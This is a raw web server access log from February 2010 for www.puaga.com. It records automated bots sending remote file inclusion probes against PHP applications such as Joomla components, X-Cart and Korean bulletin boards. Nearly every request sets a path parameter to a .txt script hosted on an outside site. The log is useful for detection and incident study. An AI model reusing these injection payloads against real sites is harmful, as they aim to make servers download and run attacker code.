58.230.162.220 - - [20/Feb/2010:07:37:43 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:39:45 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:39:45 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:39:45 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:39:50 -0800] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:40:47 -0800] "GET /logs/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:40:47 -0800] "GET /displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:40:47 -0800] "GET /logs/access_100210.log%20%20/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:41:34 -0800] "GET /displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:41:34 -0800] "GET /logs/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:41:34 -0800] "GET /logs/access_100210.log%20%20/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [20/Feb/2010:07:42:13 -0800] "GET /logs/access_100127.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:07:42:25 -0800] "GET /logs/access_100122.log//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:07:42:25 -0800] "GET /components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [20/Feb/2010:07:42:25 -0800] "GET /logs//components/com_artref/artref.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:07:43:10 -0800] "GET //skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:43:24 -0800] "GET /logs/access_100203.log%20%20/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:35 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:35 -0800] "GET /logs/access_100118.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:35 -0800] "GET /admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:35 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:44:36 -0800] "GET /index.php?sayfa=wew? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:53 -0800] "GET /logs/access_100118.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:07:44:53 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:44:53 -0800] "GET /logs/access_100203.log%20%20/displayCategory.php?basepath=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:07:45:15 -0800] "GET /logs/access_100207.log/phphtml.php?htmlclass_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:07:45:18 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:45:40 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:46:46 -0800] "GET /logs/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:46:46 -0800] "GET /logs/access_100118.log%20%20/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:46:47 -0800] "GET /ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:47:11 -0800] "GET /ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:47:11 -0800] "GET /logs/access_100205.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:47:11 -0800] "GET /logs/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:47:14 -0800] "GET /logs/access_100207.log%20%20/ggambo7002_board/write.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:47:26 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:47:26 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:47:30 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:47:30 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:47:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:47:51 -0800] "GET /ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:47:51 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:47:51 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:47:53 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:48:00 -0800] "GET /ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:48:01 -0800] "GET /logs/access_100122.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:48:01 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:48:03 -0800] "GET /logs/access_100126.log%20%20/ashnews.php?pathtoashnews=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:07:48:05 -0800] "GET /logs/access_100126.log/phphtml.php?htmlclass_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:07:48:15 -0800] "GET /logs/access_100203.log///skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:07:48:16 -0800] "GET //skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [20/Feb/2010:07:48:17 -0800] "GET /logs///skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:49:00 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:49:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [20/Feb/2010:07:49:01 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:49:11 -0800] "GET /logs/access_100117.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:49:11 -0800] "GET /index.php?sayfa=wew? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:49:11 -0800] "GET /logs/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:07:49:17 -0800] "GET /logs/access_100125.log//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:49:20 -0800] "GET /logs/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:49:21 -0800] "GET /logs/access_100118.log%20%20/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:07:49:21 -0800] "GET /ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:49:22 -0800] "GET /logs/access_100211.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.234.21.178 - - [20/Feb/2010:07:49:48 -0800] "GET /logs/access_100111.log//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://kcs.sc.kr/~kcs/board/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:50:14 -0800] "GET /logs/access_100117.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:07:50:43 -0800] "GET /logs/access_100203.log///skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:07:50:44 -0800] "GET //skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
221.143.46.124 - - [20/Feb/2010:07:50:45 -0800] "GET /logs///skin/ggambo5500_board/comment_modify.php?dir=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:51:39 -0800] "GET /index.php?sayfa=wew? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:51:57 -0800] "GET /logs/access.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:51:58 -0800] "GET /index.php?sayfa=wew? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:51:58 -0800] "GET /logs/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:52:52 -0800] "GET /logs/access_100117.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:53:23 -0800] "GET /logs/access.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:53:24 -0800] "GET /index.php?sayfa=wew? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:53:24 -0800] "GET /logs/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:54 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:54 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:54 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:55 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:58 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:58 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:58 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:54:58 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:07:55:08 -0800] "GET /logs/access_100129.log/////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:07:55:08 -0800] "GET /logs/access_100202.log/////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:07:55:08 -0800] "GET ////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [20/Feb/2010:07:55:08 -0800] "GET /logs/////write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:55:11 -0800] "GET /logs/access_100129.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:55:11 -0800] "GET /logs/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:55:11 -0800] "GET /toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:07:55:11 -0800] "GET /logs/access_100121.log%20%20/toolbar.php?dirDepth=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:21 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:23 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:26 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:27 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:28 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:30 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:30 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:30 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:32 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:56:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:56:37 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:56:37 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:37 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:37 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:39 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:56:40 -0800] "GET /logs/access_100128.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.145.42.146 - - [20/Feb/2010:07:56:47 -0800] "GET /logs/access_100117.log/index.php?sayfa=wew? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:56:48 -0800] "GET /logs/access_100206.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:56:53 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:56:53 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
